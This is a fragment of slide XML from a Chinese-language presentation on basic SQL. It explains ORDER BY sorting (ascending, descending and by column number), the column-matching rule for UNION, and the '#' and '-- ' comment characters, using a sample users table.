                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6A3ECB-F490-4F5D-8765-21F7D36F9507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278011" y="4861317"/>
            <a:ext cx="653013" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336CE6B7-0522-4AAB-8032-B62443BE134B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1837506" y="3600264"/>
            <a:ext cx="4279515" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对结果集进行排序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E40B074-BDEA-4751-8498-1778633A5B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064928" y="3101564"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>效果：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD28FFB6-7A62-4843-8086-C0EB842E0067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="1683034"/>
            <a:ext cx="997017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{187E9073-F662-4881-A992-1641CE04881E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="2417654"/>
            <a:ext cx="4870515" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代表的是降序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{405B5C8A-962C-4956-89F5-F6690A9F3CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831289" y="2799843"/>
            <a:ext cx="4870515" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代表的是升序（默认）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46E101D-1831-43A3-965A-4CDD948E4CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831289" y="5189304"/>
            <a:ext cx="6361037" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  * from users order by username desc;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EECEFABA-2246-46FC-A2BA-1BE23A9B716A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="4124829"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注意：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA4D807-DC4A-4C48-B04A-8948B18F9981}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1801343" y="4485048"/>
            <a:ext cx="9931721" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 的形式，此时的数字表示的是按照第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个列排序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0A50EB1-55E6-4534-81AE-E0159EE36114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174563" y="5740070"/>
            <a:ext cx="4495141" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  * from users order by 1;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="文本框 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD17F4D-FB65-4E99-8C9F-513B08BF882D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6405565" y="5653722"/>
            <a:ext cx="723275" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>==</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1288636596"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="421058"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3479996" y="1279077"/>
            <a:ext cx="1107996" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注释符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52E157B-EA8C-4D19-962F-2D25FAC60A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2899533" y="2699516"/>
            <a:ext cx="356188" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD820D8-9AEA-4DA2-847C-ECBE51215CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915724" y="3194535"/>
            <a:ext cx="679994" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>“-- ”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="文本框 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F13F82-944B-4A95-8688-E05CFF295323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001347" y="4317087"/>
            <a:ext cx="2834430" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
